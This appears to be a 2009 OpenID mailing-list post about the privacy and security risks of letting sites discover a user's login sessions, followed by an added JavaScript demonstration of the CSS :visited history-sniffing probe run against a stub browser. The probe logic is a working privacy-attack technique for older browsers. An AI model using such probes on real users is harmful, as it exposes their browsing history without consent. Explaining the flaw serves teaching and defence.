Discovery of an OpenID session at an OP
Peter Watkins
peterw at tux.org
Mon Dec 14 21:36:30 UTC 2009
On Mon, Dec 14, 2009 at 11:32:40AM -0800, John Panzer wrote:
> On Mon, Dec 14, 2009 at 11:21 AM, Peter Watkins <peterw at tux.org> wrote:
> > I
> > don't want the data-hungry folks at Facebook noticing that I'm logged
> > in to the Greenpeace or National Rifle Association unless I explicitly
> > approve letting Facebook know that.
> (Note that
> even today, you may be able to use visited-link color hacks to determine
> what OPs a user has recently frequented; statistically speaking you can
> already get the information you're worried about.)
I call that the "Grandfather Clause" Fallacy, and I see it pretty often.
Your argument is that because there's already an exposure (due to
unintentional consequence of DOM/Javascript interaction), it's OK to build
new systems & specs that are known to have the flaw from day one. You're
arguing that the privacy flaw exhibited in the link status checking should
be "grandfathered" in.
Why not raise the bar, and make the web a *better* place instead of settling
for today's lowest common denominator?
> > 2) Security. A malicious site could more intelligently target victims
> > if it could ascertain what sites the victim is logged into. There's no
> > need to attempt some online Gmail exploit if the malicious RP can tell
> > that the victim isn't logged in to Google.
> Again, per above, I think this information is probably already available to
> evil.org, at least statistically speaking.
That visited-links privacy hack would tell you if I visited certain
prominent pages like http://google.com, but that's quite different from
telling the RP "Hey, Peter's logged in to Google right now, so this is
a perfect time to exploit him." I'm not a gmail user, but I expect that
most gmail URLs are pretty dynamic/ugly/unique, and it would be quite
expensive and unreliable to use visited link hackery to determine if an
individual had gotten past the gmail login page, to say nothing about
whether the user is logged in *right now*.
BTW, for those of you who aren't familiar w/ the attack, here's an amusing
demo site: http://www.schillmania.com/random/humour/web20awareness/
And here's a Firefox bug ticket with a patch to disable special handling
of "visited" links, which is supposed to fix the problem.
https://bugzilla.mozilla.org/show_bug.cgi?id=147777
-Peter
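Added example for readers unfamiliar with the attack referred to above (this is illustrative code written for this page, not code from the thread, the demo site, or the Bugzilla patch): the ":visited" colour probe as it worked in 2009-era browsers. The attacker's page inserts <a> elements pointing at guessed URLs, styles :visited links with a distinctive colour, and reads the colour back with getComputedStyle(). The victim history, the OP URL, and the Gmail URL below are all made up; a constructed stub stands in for the browser so the probe runs offline, and a flag on the stub models the patched behaviour (script-visible style no longer reflecting :visited). It also shows the point made above about Gmail: history matching is by exact URL, so an attacker who cannot guess the dynamic URL gets no hit.

```javascript
// Added example, not from the original thread: the ":visited" link colour
// probe. All URLs below are constructed for illustration.

const VISITED_COLOR = "rgb(255, 0, 0)";
const UNVISITED_COLOR = "rgb(0, 0, 0)";

// Probe candidate URLs. `doc` and `computedStyle` are passed in so the same
// logic runs against a real DOM (document, window.getComputedStyle) or the
// constructed stub below. Returns { url: true|false }.
function probeVisited(candidates, doc, computedStyle) {
  const style = doc.createElement("style");
  style.textContent =
    `a.probe { color: ${UNVISITED_COLOR}; } ` +
    `a.probe:visited { color: ${VISITED_COLOR}; }`;
  doc.head.appendChild(style);

  const results = {};
  for (const url of candidates) {
    const a = doc.createElement("a");
    a.className = "probe";
    a.href = url;
    a.textContent = url;
    doc.body.appendChild(a);
    // The leak: before the fix, the computed colour honoured :visited.
    results[url] = computedStyle(a).color === VISITED_COLOR;
    doc.body.removeChild(a);
  }
  doc.head.removeChild(style);
  return results;
}

// Constructed stand-in for a browser so the probe runs under Node.
// `historyUrls` is the victim's made-up history; matching is by exact URL.
// `leaksVisited` = true models a pre-fix browser; false models the patched
// behaviour, where style exposed to script ignores :visited.
function makeStubBrowser(historyUrls, leaksVisited) {
  const history = new Set(historyUrls);
  const makeElement = (tagName) => ({
    tagName, href: "", className: "", textContent: "", children: [],
    appendChild(child) { this.children.push(child); return child; },
    removeChild(child) {
      this.children = this.children.filter((c) => c !== child);
      return child;
    },
  });
  const doc = {
    head: makeElement("head"),
    body: makeElement("body"),
    createElement: makeElement,
  };
  // The stub does not parse the injected stylesheet; it applies the effect
  // that stylesheet has in a real browser: visited anchors get VISITED_COLOR.
  const computedStyle = (el) => ({
    color: leaksVisited && history.has(el.href) ? VISITED_COLOR : UNVISITED_COLOR,
  });
  return { doc, computedStyle };
}

// Victim history (constructed): a prominent front page, an OP's login page,
// and a Gmail URL with a dynamic path an attacker would not guess.
const VICTIM_HISTORY = [
  "http://google.com/",
  "https://op.example.org/login",
  "https://mail.google.com/mail/u/0/?ui=2&ik=a1b2c3d4e5#inbox",
];

// The attacker's guess list.
const CANDIDATES = [
  "http://google.com/",            // exact match: leaks
  "https://op.example.org/login",  // exact match: leaks which OP was used
  "https://mail.google.com/mail/", // not the URL actually visited: no hit
];

function demo(leaksVisited) {
  const { doc, computedStyle } = makeStubBrowser(VICTIM_HISTORY, leaksVisited);
  return probeVisited(CANDIDATES, doc, computedStyle);
}

console.log("2009 browser:", demo(true));
console.log("patched browser:", demo(false));
```

In a real browser of the time, probeVisited(CANDIDATES, document, window.getComputedStyle) did the same thing; in the stub, demo(true) reports the two exact-match URLs as visited and the Gmail guess as not, and demo(false) reports nothing, which is what the Bugzilla patch aims for. Note that even the leaky version says only that a URL is in the history, not that a session is active right now.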